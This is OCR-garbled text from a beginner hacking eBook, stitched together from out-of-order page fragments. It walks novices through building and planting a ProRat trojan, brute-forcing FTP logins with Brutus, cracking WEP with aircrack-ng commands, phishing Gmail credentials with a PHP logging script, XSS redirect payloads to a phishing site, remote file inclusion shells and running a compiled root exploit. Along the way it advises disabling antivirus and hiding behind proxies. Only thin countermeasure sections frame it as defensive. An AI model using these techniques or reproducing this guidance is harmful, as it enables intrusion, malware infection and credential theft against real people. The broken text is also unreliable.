30. Wizard Source A Image file co CDownloadsiLinuxtubuntu 8 04 1 desk Recorder D Blank writable Usable Cancel 16 P Recording Wizard Recording CD Recording Wizard Operation has been completed Click Finish to exit 150 Recorder 3 Restart the computer with the newly made CD in the CD ROM If your computer doesn t boot from the CD and continues into Windows you must change your computer s boot order You can do this by restarting your computer and going into BIOS You get there by hitting the correct key constantly If you see the Windows screen it means you missed it The key varies from system to system Usually it is a function key such as F10 It may also be the DEL or ESC key The key should be shown on your screen immediately after you boot up your computer It is usually the key pointing to Setup 17 Setup gets you into the BIOS Dimension 388 Series BIOS Revision AAZ Picture property of www cyberwalker com Once you are in the BIOS select Boot Sequence and make sure CD ROM is set to the first one If it s not move it up All what this does is makes sure your CD ROM boots before your hard drive 18 Ssysten IRE os cueeecaes Lenk for Eevee Sequence 16 64 28 Systen Date your BIOS Sat Aug 19 2886 Drive Configuration wane ewe veces teeeewennuccuaacae CTED Hard Disk Brive SPVGG weve eee e ees ee
31. a victim installs the server onto his computer and what the hacker could do next 12 I m going to run the server on my own computer to show you what would happen Once I run it the trojan will be installed onto my computer in the background The hacker would then get a message telling him that was infected He would then connect to my computer by typing in my IP address port and clicking Connect He will be asked for the password that he made when he created the server Once he types it in he will be connected to my computer and have full control over it fee Fun ProConnective when Windows starts Message W ProRat V1 aT 27 0 0 1 connections Chat Funny Staff f Fi Password Explorer Sei Control Pane hut Down PCR S Clipboard Give Damage Passwords R Downloader Pine Online Editor IProlonnecthve Create Server is password protected 100 13 Now the hacker has a lot of options to choose from as you can see on the right He has access to all my computer files he can shut down my pc get allthe saved passwords off my computer send a message to my computer format my whole hard drive take a screen shot of my computer and so much more Below l Il show you a few examples ProRat V1 9 Connected 127 0 0 1 Ls ide Desktop Icons Lock Ctrl Alt Del PL Into Hide Start Button Open Ctrl Alt D el Message Hide Taskbar a Funny Stuff File Manager Esas Control Pane hut Down P ae aise Danas
32. address 127 0 0 1 would be the hackers IP address Footprints like these get a hacker caught and into a lot of trouble with the law Brute force Attacks With time brute force attacks can crack any passwords Brute force attacks try every possible combination of letters numbers and special characters until the right password is found Brute force attacks can take a long time The speed is determined by the speed of the computer running the cracking program and the complexity of the password Below will show you how Brutus can be used against the same FTP server but this time using the brute force option 1 Putin the target and port the same way you did for the dictionary attack For the pass mode choose Brute force and click range X Brutus AET www hoobie net brutus January 2000 File Tools Help Target 127 0 0 1 Type FTP Start Stop Clear Connection Options Fort 21 Connections l 10 Timeout F 10 Use Proxy FTF Options Modify sequence Try to stay connected for Unlimite attempts Authentication Options W Use Username W Single User Pass Mode Brute Force UserlD admin Positive Authentication Results Located and installed 1 authentication plug ins 2 If you have an idea of what the password might be then you can choose the right option For example if you know a site that requires your password to be a certain length then you ll know what to put down as a 39 minimum length thus narrow
33. all depends on what your goals are Nowadays with all the point and click programs out there you can be a fairly good ethical hacker without knowing any programming You can do some effective hacking if you understand all of the security tools very well Even if you understand what s going on in the background of these programs most people will still classify you as a script kiddie Personally think you should learn some programming Even if it s the very basics it ll give you a much better understanding of what s going on Also once you learn how to program well you ll be able to develop your own exploits which is great in many ways 1 You ll be considered an elite hacker 2 Imagine a black hat discovers a vulnerability and codes an exploit for it that no one else knows about The black hat would be able to take down thousands of machines before anyone discovers and patches the vulnerability 3 You will feel so much more satisfied having created your own program or exploit promise you this So my advice is don t settle for being a point and click hacker Take some time to understand even just the basics of programming and an entire new world of hacking will open up to you Where should I start Many people finally decide that they are going to begin learning a programming language but don t know where to start believe that before you begin to learn a programming language you should first master HTML HyperText M
34. arkup Language HTML is part of what makes up all of the website pages you see on the internet HTML is very easy to learn and it ll get you used to looking at source code 10 From there would suggest starting your programming life with C C is one of the most popular languages and it is what makes up the majority of the exploits out there today C also makes up some of the most powerful hacking programs and viruses that are out there today Best way to learn So how should go about learning the programming language of my choice 1 Purchase a beginners book on your programming language Before you choose the book make sure you read the reviews to make sure it s a good choice It is important that once you begin learning the programming language through your book you don t take big breaks Taking long breaks will cause you to forget things you learned in the beginning that apply to the rest of the book Do ALL of the practice problems provided in the book The only way you will become better is by applying what you learn When something difficult comes up or something that makes no sense to you don t avoid or skip it Instead embrace it This is how you actually learn If you still don t understand it after going over it multiple times find someone that can help you Join a programming forum Search for a website on your programming language that has a large user base There will be many profes
35. ation Done The following extra packages will be installed dpkg dev g g 4 3 Libc6 dev Libstdc 6 4 2 dev libtimedate perl linux libc dev patc Suggested packages debian keyring g multilib g 4 2 multilib gcc 4 2 doc Libstdc 6 4 2 dbg glibc doc manpages dev Libstdc 6 4 2 doc diff doc The following NEW packages will be installed build essential dpkg dev g g 4 2 libc6 dev libstdc 6 4 2 dev libtimedate perl linux libc dev patch upgraded 9 newly installed to remove and 1 not upgraded Need to get 0B 8703kB of archives After this operation 34 3MB of additional disk space will be used Do you want to continue Y n 9 This command downloads the package and then asks you if you would like to continue with installing Type in a y and hit enter It automatically will install the package 10 Now to compile the script type in the command gcc exploit c it will quickly compile If there was no error displayed then it was successful By using the Is command you can now see there s a new file named a out this is the compiled script 11 To run the new file type in the command a out This will display a little note telling you how to run the exploit against a server The below image shows all of these steps together 64 IE UDUNLI UbLUNGG Po Ele Edit View Terminal Tabs Help ubuntu ubuntu Ls Desktop Documents exploit c Music Pictures Public Templates Videos ubuntu ubuntu
36. bayt Eb Create Downloader Server 2 Kbayt k ProRat Server Eb Create CGI victim List 16 Kbayt Help 4 Next put in your IP address so the server could connect to you If you don t know your IP address click on the little arrow to have it filled in for you automatically Next put in your e mail so that when and if a victim gets infected it will send you a message We will not be using the rest of the options Create Server MH otiticatians General Settings Bind with File Server Extensions Server loon Server Size 342 Kbayt ProConnective Notitication Network and Router Supports Reverse Connection Use ProLonnective Notification IF DNS Address AR pi Mail Notification Doesn t support Reverse Connection Ed Use Mail Notification myemaltemail corn ICO Pager Notification Doesn t support Reverse ae Use ICO Pager Notification Ica um MEERE CGI Notification Doesn t support Reverse Connection use CGI Notification CGI URL UnREAL Am EE iala ama naa prorat col Create Server 96 5 Click on the General Settings button to continue Here we will choose the server port the program will connect through the password you will be asked to enter when the victim is infected and you wish to connect with them and the victim name As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager Create Server Motifi ko
37. can see below it got the correct combination of username admin and password password 37 Positive Authentication Results Target Ki 127 0 0 1 FTF admin password Located and installed 1 authentication plug ins Initializing Target 127 0 0 1 verted Opened user fle containing 6 users Opened password file containing 818 Passwords Maximun number of authentication attempts will be 4908 Engaging target 127 0 0 1 with FTP Trying username admir Positive authentication at 127 0 0 1 with User admin Password password 550 attempts Trying username administrator _ 10 A smarter hacker would use a proxy when using a program like this What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target This is a Smart idea because as you will see in the image below Brutus leaves a huge log of your presence on the target server 0001 47 10 23 2008 17 01 09 PM 000143 107 2372008 17 01 09 PM 000143 107 2372008 17 01 09 PM 000151 10 23 2008 17 01 09 PM 000151 10 23 2008 17 01 09 PM 000150 102372008 17 01 09 FM 0007 50 107 2372008 17 01 09 PM 000152 10 23 2008 17 01 09 FM 0007 52 10 23 2008 17 01 09 PM 000153 10 23 2008 17 01 09 FM 000153 10 23 2008 17 01 09 PM 000155 10 23 2008 17 01 09 PM 000155 10 23 2008 17 01 09 PM 0007 54 107 2372008 17 01 09 PM 000154 10 23 2008 17 01 09 Pr 000147 107232008 17 01 15 PM
38. ccess point and the command ends with the your wireless adapters device name 7 Now we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key Once the following command is executed check your airodump ng terminal and you should see the ARP packet count to start to increase The command is aireplay ng 3 b bssid h 00 11 22 33 44 5 66 device 74 In this command the 3 tells the program the specific type of attack which in this case is packet injection b is the MAC address of the target access point h is your wireless adapters MAC address and the wireless adapter device name goes atthe end 8 Once you have collected around 50k 500k packets you may begin the attempt to break the WEP key The command to begin the cracking process IS aircrack ng a 1 b bssid n 128 filename ivs In this command the a 1 forces the program into the WEP attack mode the b is the targets MAC address and the n 128 tells the program the WEP key length If you don t know the n then leave it out This should crack the WEP key within seconds The more packets you capture the bigger chance you have of cracking the WEP key En ur bytel vote 7D 170496 DD 150528 5A 1489927 E8 148480 3SE 146944 4D 146437 820146176 00172800 521154880 1D 153600 40151040 EBC 150528 F9 148480 44 147200 05 178176 551151552 58 14976
39. ccessful the hacker will have all the contents of my drive on his computer 13 To map out my drive onto his computer the hacker would use the command net use G TargetIPaddress DriveName So in my case would run the command net use G 192 168 1 101 SharedDocs You can use any letter in place of G This just tells the computer what to name the drive on your computer z5 Documents and Settings David Monet use G 192 168 1 161 SharedDocs Sustem error 85 has occurred he local device name is already in use Documents and Settings David Monet use J 192 168 1 1681 SharedDdocs he command completed successfully 14 What s this Looks like already have a drive G To avoid this problem go to My Computer where it will show all of your current Drives To fix this simply change the letter G to a nonexistent drive letter 83 15 Once the command is completed successfully go to My Computer and you should see a new drive under Network Drives Double clicking it brings up all of the targets documents Ne Local Disk C 4 Devices with Removable Storage Ce OVD F AM Drive D4 gt Removable Disk Es i gt Removable Disk Fi gt Removable Disk 64 a Removable Disk Hi gt Removable Disk 1 3 Network Drives _ p SharedDocs on 192 168 1 101 Ji Cracking Windows Passwords To crack Windows XP and Windows Vista passwords we will use the program called ophcrack Ophcrack
40. ck requires an exploit for a browser vulnerability With this type of attack the hacker can install worms spambots and backdoors onto your computer 2 Non Persistent Non persistent attacks are the most common types of attack and don t harm the actual website Non persistent attacks occur when a scripting language that is used for client side web development or HTML is inserted into a variable which causes the output that the user sees to be changed Non persistent attacks are only activated when the user visits the URL crafted by the attacker 3 Persistent Persistent attacks are usually used against web applications like guest books forums and shout boxes Some of the things a hacker can do with a persistent attacks are e Steal website cookies Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave By stealing your cookie the attacker can sometimes login without knowing your password e Deface the website e Spread Worms 105 Now that you know what cross site scripting is how can you tell if a website if vulnerable to it 1 If there is a search field enter a word and if that word is displayed back to you on the next page there s a chance it is vulnerable 2 Now we will insert some HTML Search for lt h1 gt hi lt h1 gt and if the word hi is outputted as a big header it is vulnerable lt hl gt hisih1 gt Ho results for
41. com q ethical hacker jobs html e Show off your newfound skills to your friends and just hack because you want to It s FUN What is a hacker A hacker is someone who likes to tinker with electronics or computer systems Hackers like to explore and learn how computer systems work finding ways to make them do what they do better or do things they weren t intended to do There are two types of hackers White Hat These are considered the good guys White hat hackers don t use their skills for illegal purposes They usually become Computer Security experts and help protect people from the Black Hats Black Hat These are considered the bad guys Black hat hackers usually use their skills maliciously for personal gain They are the people that hack banks steal credit cards and deface websites These two terms came from the old western movies where the good guys wore white hats and the bad guys wore black hats 6 Now if you re thinking Oh boy Being a black hat sounds awesome Then have a question for you Does it sound cool to live in a cell the size of your bathroom and be someone s butt buddy for many years That s what thought Hacker Hierarchy Script kiddies These are the wannabe hackers They are looked down upon in the hacker community because they are the people that make hackers look bad Script kiddies usually have no hacking skills and use the tools developed by other hackers without any
42. could list several emails that are published on the website Another search you could do in Google is inurl robots txt this would look for a page called robots txt If a site has the file robots txt it displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders Occasionally 50 you might come across some valuable information that was meant to be kept private in this file Now that the basics of footprinting have been explained we will move on to port scanning Port Scanning The point of port scanning a server is to detect its open ports the port s listening services Once a hacker knows all the services running on your server he could search for possible vulnerabilities they may have and exploit them to take control of your website In the port scanning example we will use the most popular port scanner Nmap The Nmap Security Scanner is available for both Mac and Windows users http nmap org download html The example will be shown using the Nmap GUI Graphical User Interface Otherwise known as Zenmap 1 First the hacker would choose a target and place it in the target box As you can see the Command section gets updated as well This is what the command would look like if you were running the CLI version g ie gt enmap Scan Tools Profile Help d3 m j New Scan Command Wizard Save Scan Open Scan Report a bug Help unkitled_scar l 2 v
43. e jubuntu 8 04 1 desktop i386 Places Files of type CD DVD ROM Images 120 16 Hit Select Virtual Disk Manager Actions 8888 Mew Add Remove Release Refresh gt Hard Disks G CD DVD Images F Floppy Images Mame ubunku B 04 1 desktop i386 iso Location Downloads Llinux ubuntu 8 04 1 desktop i336 150 Attached to Cancel Cancel 29 17 You will come back to where you started Hit OK Ubuntu Settings E General CD DYD ROM Hard Disks cb ovD Rom Mount CD DVD Drive m Floppy Host CDIDYD Drive D Au EP Network Enable Fassthrough ES Serial Forts 150 Image File P USB ubunku 8 04 1 desktop i396 150 C Downloadsilinux w G Shared Folders Remote Display Select a settings category fram bie dt an fhe ert pide and movre fe mouse aver a feftings fen fo gef mare N Oma 18 You will now see the main screen again Click on START in the top left corner BER IU Mew Settings Delete h Discard fe Ubuntu Wa Powered Off 30 19 You will see Ubuntu boot up in a small pop up screen Choose the option Try Ubuntu If you see a list of countries instead of the list shown below select yours and hit lt ENTER gt Make sure you are working in the Virtual Environment by clicking into the Ubuntu window x ka Ubuntu Running Sun xVM VirtualBox Machine Devices Help Try Ubuntu without any change to your computer Boot Option
44. e knowledge 32 Chapter Four Passwords 33 Nowadays passwords are the only form of security on most websites and computer systems It has become one of the most common and easiest ways for a hacker to gain unauthorized access to your computer or network Password Cracking Before we get into cracking passwords with programs will explain a couple old fashioned ways to obtain someone s password Social Engineering Social engineering is when a hacker takes advantage of trusting human beings to get information from them For example if the hacker was trying to get the password for a co workers computer he Even though use he hackers are of both genders and just chose to use he in these examples could call the co worker pretending to be from the IT department The conversation could be something like Bob Hello Suzy My name is Bob and I m from the IT department We are currently attempting to install a new security update on your computer but we can t seem to connect to the user database and extract your user information Would you mind helping me out and letting me know your password before my boss starts breathing down my neck It s one of those days ya know Suzy would probably feel bad for Bob and let him know her password without any hesitation BAM She got social engineered Now the hacker can do whatever he pleases with her account Shoulder surfing Shoulder surfing is
45. e t target address here o offset here 13 Once a hacker runs this script against a vulnerable machine and the script works he will have root access to the target computer 68 The more exploits you run the more you will notice that half of them may not work Many exploits are created and tested in specific environments and the expected outcome only happens when the exploit is run in the exact same environment That is another reason why programming knowledge is needed so you could edit the exploit script to work for you Once a skilled hacker gains root to a server he has the ability to do a lot of damage Some of the things a hacker might do with a rooted server is e Add himself as a permanent user for future access e Add the server into his botnet collection so he could use it as a weapon against other servers e Use it as a proxy to hack other websites e Install a rootkit so he can come back and have full control over the server when needed e Constantly steel information as it comes e Use the system to store illegal data e Deface the website and sometimes the hacker will delete everything off of the server Countermeasures There are a few things you can do to stay secure from network hacking attempts 1 Keep all your software up to date There will always be new vulnerabilities coming out and your responsibility is to patch them immediately after a patch comes out 2 Implement a firewall This will keep most
46. e 930 200 5 Cagliari Italy Okay IRT o S 138 5 133 3 Copenhagen Denmark Okay 11275 112 3 113 0 Antwerp Belgium Okay 94 6 eye le a ol Erakow Poland Okay Soe 198 1 135 3 Nagano Japan Okay 144 2 145 0 146 4 Sydney Australia Ok ay 150 7 152 5 157 5 Hong Kong China Okay 249 9 26 Lod z4 9 Lille France Okay 143 4 IZRA 155 5 Auckland New Zealand Ok ay 152 4 193 6 25 3 Melbourne Australia Okay 22 i Pau 242 5 Haifa Israel Okay 170 5 LTE a 173 1 Singapore Singapore Ok ay 216 6 216 8 217 0 Forto Alegre Brazil Okay 21121 le l4 5 Mumbai India Okay Zoo eel 265 6 266 1 zurich Switzerland Okay Iems 130 1 134 1 Johannesburg South Africalkarr Eee ce aan 358 53 Shanghai China Packets lost 100 4 Next the hacker would do a Whois lookup on the company website Go to http whois domaintools com and put in the target website As you can see this gives a HUGE amount of information about the company You see the company e mails address names when the domain was created when the domain expires the domain name servers and more 5 A hacker can also take advantage of search engines to search sites for data For example a hacker could search a website through Google by searching site www the target site com this will display every page that Google has of the website You could narrow down the number of results by adding a specific word after For example the hacker could search site www the target site com email This search
47. e control of your mouse It can also be used for some serious things like accessing your data erasing your files stealing your passwords and capturing your keystrokes 4 Logic Bombs Logic bombs are usually pieces of code that are programmed into a program that lie dormant until a certain time or until a user does a certain action which causes it to be executed When it is triggered it performs a certain function that the program wasn t intended to do 5 Bacteria Bacteria make many copies of themselves and eventually end up taking up all of the computers recourses such as all of its processor power memory and disk space This results in the legitimate user losing access to those resources 94 6 Blended Threats Blended threats combine all of the characteristics of the above and use them along with system vulnerabilities to spread and infect machines ProRat To show you an example of a malicious program will use a well known Windows Trojan ProRat 1 Download ProRat Once it is downloaded right click on the folder and choose to extract it A password prompt will come up The password will be pro Open up the program You should see the following PROHRACH MET PRoFEssionmal INITERMET N Message NEE File Manager Shut Down PC F Downleder Run Prolonnectrye 95 3 Next we will create the actual Trojan file Click on Create and choose Create Create ProRat Server 342 K
48. earn how to program Also every now and then you will receive other errors such as the one the second picture shows above These errors have to do with the server configurations Now as a hacker you have to learn a lot on your own By going around asking simple questions like this all the time will make you look bad and the most common response you will receive www google com Google is your friend so take advantage of it So starting now begin to use Google and if you are still stuck then you can ask help on community forums 5 Once the errors are fixed and the program is running a DoS attack will be launched the target website up until you exit the command screen If the target server can t handle much you may be able to see the affect of your exploit by going to the site and clicking around If it is working the site will begin to lag and it ll take a long time to load pages Eventually the server may go down completely Perl Running Perl exploit scripts is just as easy as running PHP scripts Download and install the appropriate version of ActivePerl Next the hacker would find an exploit for vulnerability In this example we will use the following example http milwOrm com exploits 6581 for WinFTP Server 2 3 0 This is also a Denial of Service DoS exploit Edit the options like the target server and others as needed Then save the file as exploit pl As you can see Pearl exploits begin with I usr bin perl
49. eless Hacking en Learning Linux Password Cracking Phishing Countermeasures More Programs Foot printing Port Scanning Banner Grabbing Searching for Vulnerabilities Penetrating Countermeasures 1 Scanning for Wireless Networks 2 Cracking WEP 3 Packet Sniffing 4 Countermeasures G Windows acces csensecceesnenassknasacesectssuireanecsnsuseecesunsoucssteinesunsneeesnsavese 79 1 NetBIOS 2 Cracking Windows Passwords 3 Countermeasures he a eosin cs cases ctvaecc OEE E EAE E AE ERT 93 1 Definitions 2 ProRat 3 Countermeasures E A carne nun vareuneuuseuneeueaswnnessncsevesecesberneciceaseas 104 1 Cross Site Scripting 2 Remote File Inclusion 3 Local File Inclusion i e ose sae te tes sence cies cence E A E A 114 1 Congratulations 2 Keep Learning 3 www MrCracker com Chapter One Introduction How can I use this eBook Congratulations By purchasing this eBook you have taken your first step inthe exciting process of becoming a Master Hacker The knowledge you acquire from this eBook can be put to use in many ways e With the ability to think like a hacker you ll be able to protect yourself from hackers attacking you e You may wish to seek a career in Ethical Hacking Usually hired by an organization an ethical hacker uses the same tools and techniques as a hacker to find and secure vulnerabilities in computer systems o http www jobster com find US jobs for ethical hacker o http www indeed
50. essionals ready to help you It also has a large database of security papers and tools e DarkMindz A large hacking related community that constantly provides informative information on the forum security papers and source code e Black Hat Forums A great hacking related forum full of many knowledgeable members Since hacking and programming go together like peanut butter and jelly below have a list of a few great programming forums e lt dream in code gt e Programming Forums e Go4Expert e CodeCall 115 www MrCracker com MrCracker com is my security hacking blog have just launched it and will be constantly updating it Come on down and subscribe to my soon to be launched newsletter It will be full of hacking related news and exclusive content The subscribe box is on the right column of my website Hurry before it s too late Suggestions would love to hear your honest opinion about this course What did you think of it What did you like What didn t you like What would you like to see in future versions What are you interested in Please visit the following URL to participate in this quick informative survey Click here for survey That s all folks hope that this course has been a great learning experience for you If you have any questions please feel free to e mail me at info MrCracker com Cheers Dawid Melnichuk 116
51. etBIOS 143 IMAP Internet Message Access Protocol 161 SNMP Simple Network Management Protocol 52 194 IRC Internet Relay Chat 220 IMAP3 Internet Message Access Protocol 3 443 SSL Secure Socket Layer 445 SMB NetBIOS over TCP 1352 Lotus Notes 1433 Microsoft SQL Server 1521 Oracle SQL 2049 NFS Network File System 3306 MYSQL 4000 ICQ 5800 VNC 5900 VNC 8080 HTTP Along with finding out what ports are running the hacker needs to also find out what operating system the server is running There are always a lot of operating system vulnerabilities out there to choose from So by knowing the operating system the hacker s chances of taking over the server go up As you can see there is an option on Nmap to detect the operating system but this scan is very loud and easily detected so it is better to avoid it if possible A simple way to determine what the server is running is by getting a 404 error page You can get there by going to a page that doesn t exist For example the hacker would put in www targetsite com asdlfjasl php this page will most likely not exist and bring him to the 404 page On most sites the 404 error page displays the server operating system along with its version Many sites nowadays don t display this by putting up custom 404 pages so this may not always work If you are planning on using the CLI version of Nmap or want a more in depth look at all the commands take a look
52. exactly what it sounds like The hacker would simply attempt to look over your shoulder as you type in your password The hacker may also watch weather you glance around your desk looking for a written reminder or the written password itself Guessing If you use a weak password a hacker could simple guess it by using the information he knows about you Some examples of 34 this are date of birth phone number favorite pet and other simple things like these Now that we have the simple low tech password cracking techniques out of the way let s explore some high tech techniques Some of the programs will use in my examples may be blocked by your anti virus programs when you attempt to run them Make sure you disable your anti virus program when you decide to download and explore them There are different ways a hacker can go about cracking a password Below will explain and give an example of each way Dictionary Attacks A dictionary attack is when a text file full of commonly used passwords or a list of every word from the dictionary is used against a password database Strong passwords usually aren t vulnerable to this kind of attack In the following example will use Brutus a very common password cracker to show a dictionary attack against an ftp server Brutus is a Windows only program but at the end of this chapter will list a couple more password crackers some of which are made for Mac Windows and Linux
53. for on line help type help version lt Enter gt for version info Running in Vi compatible mode type set nocp lt Enter gt for Vim defaults type help cp default lt Enter gt for info on this 4 To get into typing mode type in I Shift 5 You are now in insert mode Right click and paste in the exploit 62 6 The script should have pasted in Now it s time to save it Hit the lt ESC gt key and then type in wq exploit c This quits and saves the document as exploit c 7 Now type in the command Is This command lists all the files in the current directory You should see your newly made file in the list UDUntI UbUntI File Edit View Terminal Tabs Help ubuntu ubuntu vi ubuntu ubuntu Ls Desktop Documents exploit c Music Pictures Public Templates Videos ubuntu ubuntu 8 Now we will compile the script using the GCC compiler but before we compile this script we need to first install a development package of all the libraries and headers needed to compile C C scripts It s a very easy process In the terminal type in the following command sudo apt get install build essential 63 UDUNLI UbUNLd File Edit View Terminal Tabs Help To run a command as administrator user root use sudo lt command gt See man sudo root for details ubuntu ubuntu sudo apt get install build essential Reading package lists Done Building dependency tree Reading state inform
54. fox do with this File Open with PowerI50 default a C Do this automatically For files like this from now on a 2 Download and install IsoRecorder at http isorecorder alexfeinman com isorecorder htm and burn the Ubuntu iso file onto a blank CD with the software 15 Once you have downloaded and installed the IsoRecorder software locate the Ubuntu image file right click and select Copy image to CD and follow the rest of the steps shown in the image File Edit View Favorites Tools Help Back I Sf Search Key Folders si A Folder Sync Address C Downloads Linux File and Folder Tasks mi Rename this File Move this File Copy this file Publish this file to the Web E mail this file X Delete this file Other Places O Downloads My Documents OD Shared Documents ig My Computer t My Network Places Details A ubuntu 8 04 1 desktop i386 150 File Date Modified Wednesday July 02 2005 10 47 AM Size 694 MB Cony image to CD ope Q Scan ubuntu 8 04 1 desktop i386 iso Hex Edit with Hex Workshop v5 Open With SB Add to archive SB Add to ubuntu 8 04 1 desktop i386 rar SS Compress and email SB Compress to ubuntu 8 04 1 desktop i386 rar and email SBeExtract files EB Extract Here SB Extract to ubuntu 8 04 1 desktop i386 PowerISO Send To Cut Copy Create Shortcut Delete Rename Properties r CD Recording
55. g through a network such as usernames passwords IM conversations and e mails Let s show you an example 1 Download and install Wireshark 2 Launch it and click on the option to list the available capture interfaces as shown below The Wireshark Network Analyzer File Edit View Go Capture Analyze Statistics Help Aw ewe gt o F2 EE ae Filter list the available capture interfaces Expression Clear Apply fat oes i Description Packets Packetsjs i Adapter for generic dialup and VPN capture WL NETGEAR WG111 802 119 Wireless USB2 0 Adapter Microsoft s Packet Scheduler 192 168 1 101 3 Next choose the target to begin to capture their packets and click on start 4 If you don t know which one to choose wait a little bit and the one that accumulates the most packets is your best choice Many captured packets shows that the user is currently active Wireshark Capture Interfaces Description Packets Packets s oter For generic dialup and VPM capture E NETGEAR WG111 802 119 Wireless USB2 0 Adapter Microsoft s Packet Scheduler 192 168 1 101 920 76 5 Now to show you an example of how Wireshark can be used I will start up Windows Live and send a message As you will see in the image below my whole conversation will be captured To filter out allthe useless data and to only display the Windows Live related packets type in msnms in the filter bar NETGEAR WG111 807 1 Te Wireless
56. gcc exploit c ubuntu ubuntu Ls a out Documents Music Public Videos Desktop exploit c Pictures Templates ubuntu ubuntu a out BeroFTPD 1 3 4 1 exploit by gitestl Usage a out options Options h hostname t target 0 offset Available targets 0 RedHat 6 2 with BeroFTPD 1 3 4 1 from tar gz 1 Slackware 7 0 with BeroFTPD 1 3 4 1 from tar gz 2 Mandrake 7 1 with BeroFTPD 1 3 4 1 from rpm ubuntu ubuntu za out h host name here t target site here o offset here 12 The last line of the picture shows the proper way a hacker would use the script against a server 13 Once the hacker ran the script against a vulnerable server running BeroFTPD 1 3 4 and the script worked the hacker would now have root access to the server Below is an image of what the root account on Ubuntu would look like root ubuntu File Edit View Terminal Tabs Help root ubuntu whoami root root ubuntu As you can see the whoami command tells you who you are on the system In this case am root 65 Cygwin If you only have access to a Windows machine and you come across a C C script that is only meant to be compiled in Linux then you can use Cygwin to make it possible in Windows Let s get right into it 1 Download Cygwin from http www cygwin com 2 Run the installer 3 Choose to install from the internet Cygwin Setup Choose Installation Type Choose A Download Source Choose whether to in
57. get it ready for appending data Which in this case is your username and password Foreach S_GET as Svariable gt Svalue fwrite Shandle Svariable fwrite Shandle fwrite Shandle Svalue fwrite Shandle r n This section simply assigns all the information going through this form to a variable This includes your username and password Fwrite Shandle r n This writes your details to the file list txt fclose Shandle This simply closes the connection to the file Vist txt exit gt Marks the end of the PHP program So far you should see the following in your folder hy phish list m FHF File Text Document 2KB OKB index i Firefox Document ServiceLogin Files 16 KB di 43 5 Now the hacker would have to edit the main Gmail page to include his PHP script To see what the hacker would do open up the main Gmail page named index htm with notepad 6 Hit lt CTR gt F or go to Edit gt Find type in action and hit Find Next PUPIL p 8 fuse T Find what actior Direction L Match case OUp Down gt lt styles lt form jd gaia_loginform MAAE hrtps www google EANSE EDUNE 3 Sery Neel Eg maut se ial 7 This will highlight the first occurrence of the word action in the script and you should see the following lt form id gaia_loginform Maahi https www google com accounts Servwice
58. hcrack LiveCD No installation Once you have it downloaded install it When the option comes up to download rainbow tables unclick them all and just install the program It is better to download the rainbow tables separately ophcrack 3 0 1 Setup Choose Components Choose which Features of ophcrack 3 0 1 you wank to install Check the components you wank to install and uncheck the components you don t want bo install Click Next to continue Select components ta install opherack required ME Download and Install small winsP tables 380M6 Download and Install Fast WinXP tables 703MB Download and Install Free Vista tables 461MB Space required 12 6MB 85 3 Once it is installed go to the ophcrack website and click on Tables in the navigation This will display all the tables you can download As you can see the more characters covered the bigger the table gets Choose the correct table for your operating system XP free small 380MB formerly known as SS Tl204 T0K Success rate 99 9 Charset 01232456 09abcdefghilkImnopgrstuvwy zABCDEFGAURLMNORFRORST ANGSTZ mdosum 1 ctastch 1 e27 5236c 1f23eb241 bcb XP free fast 703MB formerly Known as so TIC04 5K Success rate 99 9 Charset 0143456 o9abcdefghi kimnoparstuvws y ABCDEF GHIJKLMNOP QRS TU ys Z mdssum 65369566 coo edSfAder0z2a02bd XP special 7 5GB formerly known as 20k Success rate 36 Charset 0123456709 abcdetghijkimnopgrs
59. he following JavaScript code lt script gt window location http phishing site com lt script gt Now when you go to the finished link the legitimate site will redirect to the phishing website Next what the hacker would do is encode the URL to make it look more legit and less suspicious You can encode the URL at http www encodeurl com My finished encoded URL is http 3A 2F 2Flocalhost 2Fform php 3Fsearchbox 3D 3Cscript 3Ewindow locati on 3D 5C 22http 3A 2F 2Fphishing site com 5C 22 3CH2Fscript 3E 26search 3Dsearch 21 Once the victim sees that the link points to the legitimate website he will be more likely to fall for the phishing attack Remote File Inclusion Remote File Inclusion RFI occurs when a remote file usually a shell a graphical interface for browsing remote files and running your own code on a server is included into a website which allows the hacker to execute server side commands as the current logged on user and have access to files on the server With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system Many servers are vulnerable to this kind of attack because of PHP s default settings of register_globals and allow_url_fopen being enabled Although as of PHP 6 0 register_globals has been depreciated and removed many websites still rely on older versions of PHP to run their web 107 applications Now let s go through
60. ine or causing it to deny requests from legitimate users trying to access it Buffer Overflow BoF A buffer overflow happens when a program attempts to store more data into a buffer or a data storage area then it was meant to hold Because the buffer was only meant to hold a certain amount of data the extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker Once this code is executed the hacker can receive full control of the server 56 If you search the MilwOrm exploit database you will see that in many exploit titles it reads local exploit or remote exploit Below are their definitions Local Exploit To run a local exploit you must first have access and privileges on the machine Local exploits are usually used to escalate ones privileges to admin or root In other words it allows an ordinary user to gain root privileges Remote Exploit A remote exploit is pretty much the same thing as a local exploit except that it isn t run locally but launched from anywhere across the internet A hacker usually has to use a combination of both remote and local exploits to gain full control of a system For example the hacker may have been able to gain regular privileges with a remote exploit attack and then be able to escalate to root privileges with the help of a local exploit Penetrating So now you might be wondering Once the hacker finds the right exploit how
61. ing down the end results and shortening the cracking process Brutus Brute Force Generation tA C Digits only Min Length D 7 Max Length Boy f Uppercase Alpha f Mixed Alpha Alphanumeric Full Reyspace O Custom Range etaoinsrhldeumfpgwybvksigz 2345675901 3 chose lowercase alpha which has the second smallest amount of combinations Even at second smallest it came up with 321 272 407 possible password combinations Now you know why it can take so long to crack one password Sled 1 authentication plug in Located and ing Initializing Target 147 0 0 1 venfed Brute force will generate 321272407 Passwords Masiniun number of authentication attempts will be 321272407 Engaging target 127 0 0 1 with FTP Rainbow Tables A Rainbow table is a huge pre computed list of hash values for every possible combination of characters A password hash is a password that has gone through a mathematical algorithm that transformed it into something absolutely foreign A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string A very common hashing algorithm used as security to store passwords in website databases is MDS Let s say you are registering for a website You put in a username and password Now when you submit your password goes through the MD5 algorithm and the outcome hash is stored in a database Now since you can t get the passwo
